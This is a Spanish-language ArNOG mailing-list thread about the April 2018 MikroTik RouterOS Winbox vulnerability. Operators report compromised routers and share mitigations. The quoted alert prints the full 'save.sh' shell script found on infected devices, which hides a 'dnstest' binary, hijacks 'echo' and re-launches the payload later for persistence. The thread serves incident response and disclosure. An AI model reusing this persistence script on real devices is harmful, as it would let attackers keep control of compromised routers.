<div dir="ltr"><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">MK no esta contando todo. <br>Procesos de MGT corriendo como root, passwords reversibles (y no se si en plain-text) y modificaciones al SO que no son visibles para un usuario normal de la CLI/Winbox.<br><br></div><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">Lo mas loco que salvo el bug de acceso, tomaron como "secundario" todo lo otro. Palabras del propio soporte.<br><br></div><div class="gmail_default" style="font-family:tahoma,sans-serif;font-size:small;color:rgb(0,0,0)">Saludos.<br></div></div><div class="gmail_extra"><br><div class="gmail_quote">El 24 de abril de 2018, 8:35, Jose Luis Gaspoz <span dir="ltr"><<a href="mailto:gaspozj@is.com.ar" target="_blank">gaspozj@is.com.ar</a>></span> escribió:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex">
<div dir="ltr">
<div dir="ltr">
<div style="FONT-SIZE:12pt;FONT-FAMILY:'Calibri';COLOR:#000000">
<div> </div>
<div>Nosotros fuimos víctimas de esto hace unos 10 dias atrás (eso quiere decir
que puede hacer bastante tiempo que está) en un CCR 1036 que no estaba lo
suficientemente cerrado al exterior y fué exactamente de esa manera.... lo
sospechoso es el tema que lo primero que hace (que aparece en el log) es “ip
services changed by .....” y tiene que ser un script que lo corre porque el log
tiene el mismo timestamp que el logueo vía Winbox.</div>
<div> </div>
<div>No encontramos ningún cambio aparente en “ip services” (revisamos todo lo
que se puede ver en un CCR).</div>
<div> </div>
<div>Era de un cliente, por lo que se lo actualizó (SO y firmware), se cambiaron
las pass y se cerro el equipo para cualquier servicio exterior y “en apariencia”
esta funcionando normalmente (no tiene mucha exigencia por ser de un
cliente).</div>
<div> </div>
<div>OJO, no hay nada sospechoso, así que puede haber muchos infectados porque
solo aparece eso en el log hasta que se sobreescribe..... salvo que esten
logueando a un syslog.</div>
<div> </div>
<div>Saludos </div>
<div> </div>
<div style="FONT-SIZE:12pt;FONT-FAMILY:'Calibri';COLOR:#000000">Ing. Jose
Luis Gaspoz<br>Internet Services S.A.<br>Tel: 0342-4565118<br>Cel:
342-5008523</div>
<div style="FONT-SIZE:small;TEXT-DECORATION:none;FONT-FAMILY:"Calibri";FONT-WEIGHT:normal;COLOR:#000000;FONT-STYLE:normal;DISPLAY:inline">
<div style="FONT:10pt tahoma">
<div> </div>
<div style="BACKGROUND:#f5f5f5">
<div><b>From:</b> <a title="carriers@dainus.net" href="mailto:carriers@dainus.net" target="_blank">Carriers</a> </div>
<div><b>Sent:</b> Tuesday, April 24, 2018 7:06 AM</div>
<div><b>To:</b> <a title="lista@arnog.com.ar" href="mailto:lista@arnog.com.ar" target="_blank">lista@arnog.com.ar</a> ; <a title="lista@arnog.com.ar" href="mailto:lista@arnog.com.ar" target="_blank">lista@arnog.com.ar</a>
</div>
<div><b>Subject:</b> Re: [Lista ArNOG] Alerta seguridad
Mikrotik</div></div></div>
<div> </div></div>
<div style="FONT-SIZE:small;TEXT-DECORATION:none;FONT-FAMILY:"Calibri";FONT-WEIGHT:normal;COLOR:#000000;FONT-STYLE:normal;DISPLAY:inline"><div><div class="h5">
<div>Estimados ojo con esa versión yo tube un par de
problemas se me iban los ping altisimos . al parecer hay cambios en
el enrutamiento<br><br></div>
<div class="gmail_quote">En 24 de abril de 2018, en 06:46, Juan Pablo Orsi <<a href="mailto:juanpablo@internetlocal.com.ar" target="_blank">juanpablo@internetlocal.com.<wbr>ar</a>> escribió:
<blockquote class="gmail_quote" style="PADDING-LEFT:1ex;MARGIN:0pt 0pt 0pt 0.8ex;BORDER-LEFT:rgb(204,204,204) 1px solid">
<div class="m_-2858103419421404887entry-content" style="BOX-SIZING:border-box;BORDER-TOP:0px;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;TEXT-ALIGN:justify;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;LINE-HEIGHT:1.62em;PADDING-RIGHT:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit">
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">En
el día de hoy <a style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(33,117,155);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;BACKGROUND-COLOR:transparent;font-stretch:inherit" href="http://mikrotik.com/" target="_blank">MikroTik</a> ha publicado un<span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(255,0,0);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"> <a style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(255,0,0);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;BACKGROUND-COLOR:transparent;font-stretch:inherit" href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" rel="noopener" target="_blank"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">alerta
de seguridad</span></a> sobre una <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">vulnerabilidad
en el RouterOS que afecta a todas las versiones desde la
v6.29.</span></span></p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Según
el alerta, indica que la vulnerabilidad ha sido descubierta por ellos mismos y
que recomiendan actualizar <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">ASAP</span>
(<span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">lo
mas pronto posible</span>).</p>
<blockquote style="BOX-SIZING:border-box;QUOTES:none;BORDER-TOP:0px;FONT-FAMILY:georgia,"URW Bookman L",serif;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(68,68,68);PADDING-BOTTOM:0px;FONT-STYLE:italic;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 30px 0px 60px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">La
vulnerabilidad permite a una “<em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">herramienta
especial</em>” conectar al puerto del Winbox y poder solicitar la base de
datos de los usuarios del sistema.</span></p></blockquote>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Para
tomar una medida al respecto se recomienda:</p>
<ul style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px 30px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">
<li style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:4px 0px 0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Actualizar
a la<span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">
v6.42.1</span> y <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">v6.43rc4</span>
*<span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(255,102,0);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Con
precaución</span></span>(leer mas adelante)
</li><li style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:4px 0px 0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Cerrar
el puerto del Winbox para el acceso publico</span>mediante un <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">address
list</em> y el <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">firewall</em>
en el chain <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">input</em>
</li><li style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:4px 0px 0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Limitar
el rango de IP permitidos</span> en <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">ip
> service > winbox</em> a las redes locales unicamente.
</li><li style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:4px 0px 0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Cambiar
las contraseñas de los usuarios.</span></li></ul>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Es
importante tener en cuenta</span>que en las recientes versiones del <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">RouterOS</span><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">
existe un nuevo esquema en el manejo del bridge</span>, porque lo hay que
tener ciertas precauciones al actualizar debido a que se han dado casos de
actualizaciones fallidas en configuraciones que tienen bridge y utilizan el
chip switch.</p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">En
caso de equipos que se encuentren en producción y no es posible
actualizar rápidamente el sistema operativo, es <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(255,0,0);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">mandatorio
que se cierre el acceso del winbox y cambiar las contraseñas de los
usuarios.</span></span></p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Por
el momento no es posible conocer o detectar que el sistema ha sido vulnerado,
por lo que también se recomienda aplicar el punto anterior.</p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-variant-numeric:inherit;font-variant-east-asian:inherit;font-stretch:inherit"><font color="#333333" face="Lato, sans-serif"><span style="FONT-SIZE:17px"><a href="https://forum.mikrotik.com/viewtopic.php?f=21&t=133533&p=656255" target="_blank">https://forum.mikrotik.com/<wbr>viewtopic.php?f=21&t=133533&p=<wbr>656255</a></span></font><br></p>
<h4><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(255,0,0);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">ACTUALIZACION</span></span>:</h4>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Algunos
usuarios están reportan que detectan dos archivos dentro de <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">files</span></em>
con el nombre de <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">dnstest</span></em>
con contenido binario y <span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">save.sh</em>
c</span>on el siguiente contenido:</p><pre style="BOX-SIZING:border-box;OVERFLOW:auto;WORD-WRAP:break-word;MARGIN-BOTTOM:24px;FONT-SIZE:12px;BORDER-TOP:rgb(227,227,227) 1px dashed;FONT-FAMILY:monaco,consolas,"Lucida Console","Bitstream Vera Sans Mono",monospace;BORDER-RIGHT:rgb(227,227,227) 1px dashed;BACKGROUND:rgb(248,248,248);BORDER-BOTTOM:rgb(227,227,227) 1px dashed;WORD-BREAK:break-all;COLOR:rgb(0,0,0);PADDING-BOTTOM:15px;PADDING-TOP:15px;PADDING-LEFT:15px;BORDER-LEFT:rgb(227,227,227) 1px dashed;MARGIN-TOP:0px;LINE-HEIGHT:1.62em;PADDING-RIGHT:15px;font-stretch:inherit;border-radius:4px">#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac
if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi
mkdir -p $dest
export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest
echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test
echo -e "#!/bin/ash\n/$dest.test&\n/<wbr>bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh
</pre>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><span style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;FONT-WEIGHT:600;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">El
intento tiene el siguiente comportamiento:</span></p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">Como
se observa en la siguiente captura, el primer acceso es un intento fallido del
winbox, por lo que se presume que tiene el acceso a la DB de usuarios. Luego
el acceso es con el usuario con permisos <em style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit">full.</em></p>
<p style="BOX-SIZING:border-box;BORDER-TOP:0px;FONT-FAMILY:inherit;BORDER-RIGHT:0px;BORDER-BOTTOM:0px;COLOR:rgb(51,51,51);PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px 0px 24px;BORDER-LEFT:0px;PADDING-RIGHT:0px;font-stretch:inherit"><img style="BORDER-LEFT-WIDTH:0px;BOX-SIZING:border-box;MAX-WIDTH:100%;HEIGHT:auto;FONT-FAMILY:inherit;BORDER-RIGHT-WIDTH:0px;VERTICAL-ALIGN:middle;BORDER-BOTTOM-WIDTH:0px;PADDING-BOTTOM:0px;PADDING-TOP:0px;PADDING-LEFT:0px;MARGIN:0px;PADDING-RIGHT:0px;BORDER-TOP-WIDTH:0px;font-stretch:inherit" alt="Comportamiento de Acceso" src="https://i.imgur.com/7XbVAWy.png"></p></div><pre class="m_-2858103419421404887blue"><hr><br>Lista mailing list<br><a href="mailto:Lista@arnog.com.ar" target="_blank">Lista@arnog.com.ar</a><br><a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista" target="_blank">http://mailmancabase.<wbr>interdotnet.com.ar/mailman/<wbr>listinfo/lista</a><br></pre></blockquote></div>
</div></div><div id="m_-2858103419421404887DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2"><br>
<table style="BORDER-TOP:#d3d4de 1px solid;COLOR:#000000">
<tbody>
<tr>
<td style="WIDTH:55px;PADDING-TOP:18px"><a href="http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient" target="_blank"><img style="HEIGHT:29px;WIDTH:46px" alt="" src="https://ipmcdn.avast.com/images/icons/icon-envelope-tick-green-avg-v1.png" width="46" height="29"></a></td>
<td style="FONT-SIZE:13px;FONT-FAMILY:arial,helvetica,sans-serif;WIDTH:470px;COLOR:#41424e;PADDING-TOP:17px;LINE-HEIGHT:18px">Libre
de virus. <a style="COLOR:#4453ea" href="http://www.avg.com/email-signature?utm_medium=email&utm_source=link&utm_campaign=sig-email&utm_content=emailclient" target="_blank">www.avg.com</a> </td></tr></tbody></table></div>
<p>
</p><hr>
______________________________<wbr>_________________<span class=""><br>Lista mailing
list<br><a href="mailto:Lista@arnog.com.ar" target="_blank">Lista@arnog.com.ar</a><br><a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista" target="_blank">http://mailmancabase.<wbr>interdotnet.com.ar/mailman/<wbr>listinfo/lista</a><br></span><p></p></div></div></div></div>
<br>______________________________<wbr>_________________<br>
Lista mailing list<br>
<a href="mailto:Lista@arnog.com.ar">Lista@arnog.com.ar</a><br>
<a href="http://mailmancabase.interdotnet.com.ar/mailman/listinfo/lista" rel="noreferrer" target="_blank">http://mailmancabase.<wbr>interdotnet.com.ar/mailman/<wbr>listinfo/lista</a><br>
<br></blockquote></div><br><br clear="all"><br>-- <br><div class="gmail_signature" data-smartmail="gmail_signature"><div dir="ltr"><b>Ivan Chapero<br><span style="color:rgb(102,102,102)">Área Técnica y Soporte</span></b><span style="color:rgb(102,102,102)"> </span><br style="color:rgb(102,102,102)"><span style="color:rgb(102,102,102)">Fijo: 03464-470280 (interno 535)</span> | <span style="color:rgb(102,102,102)">Móvil: 03464-155-20282</span> | <span style="color:rgb(102,102,102)">Skype ID: ivanchapero</span><div><span style="color:rgb(102,102,102)">--</span><br style="color:rgb(102,102,102)"><div style="text-align:center"><span style="color:rgb(102,102,102)">GoDATA Banda Ancha - CABLETEL S.A. | Av. 9 de Julio 1163 - 2183 - Arequito - Santa Fe - Argentina</span></div><br><br><br><br><br><br><br></div></div></div>
</div>